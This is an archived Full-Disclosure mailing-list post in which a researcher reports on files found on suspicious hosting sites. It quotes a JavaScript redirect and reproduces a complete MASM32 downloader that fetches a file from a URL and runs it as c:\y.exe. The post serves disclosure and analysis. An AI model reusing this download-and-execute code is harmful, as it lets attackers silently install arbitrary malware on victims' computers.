 |
|
|
 Welcome to the Virus.Org Mailing List Archive |
||
 |
||
|
||
|
On 24-mei-04, at 14:46, Feher Tamas wrote: http://www.b00gle.com/fa/?d=get good thing the internet has a memory :)http://216.239.59.104/search?q=cache:yYCmQqdLUvMJ:www.b00gle.com/fa/ %3Fd%3Dget+&hl=en http://www.google.com/search?q=cache:iyMDunIkp08J:www.b00gle.com/fa/ tool.html+&hl=en http://www.pizdato.biz/acc1/ to http://www.pizdato.biz/acc9/ show the same files, as if copied in a for loop i especially liked 2 files in the dir; counter.htm containing the extremely funny <script language="JavaScript"> <!-- var lang = navigator.systemLanguage; if (lang == "ru") document.location = "home.html"; //--> </script>but then i saw this: http://www.pizdato.biz/acc10/2DimensionOfExploits.asm Hehehe, Open Source is getting big!, didnt see no GPL licence so i hope im not Violating someones copyright by posting this here,.... .386 .model flat,stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\kernel32.inc includelib \masm32\lib\kernel32.lib include \masm32\include\user32.inc includelib \masm32\lib\user32.lib .data szLibrary db "urlmon.dll",0 szFunction db "URLDownloadToFileA",0 szFileName db "c:\y.exe", 0 .code start: invoke GetCommandLineA add ax, 0Ah lea ecx, [eax] push ecx invoke LoadLibrary, addr szLibrary invoke GetProcAddress, eax, addr szFunction pop ecx push 0 push 0 lea ebx, [szFileName] push ebx push ecx push 0 call eax invoke WinExec, addr szFileName, 1 invoke ExitProcess, NULL end startYet i do feel a bit suspicious about this set of files;,... bit TOO educating i think ;) cheers! thijs --If i had 6 hours to chop down a tree, I'd spend the first four sharpening the axe.
-- Abraham Lincoln
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
|
All Trademarks Acknowledged.
Please view our Terms and Conditions and our Privacy Policy.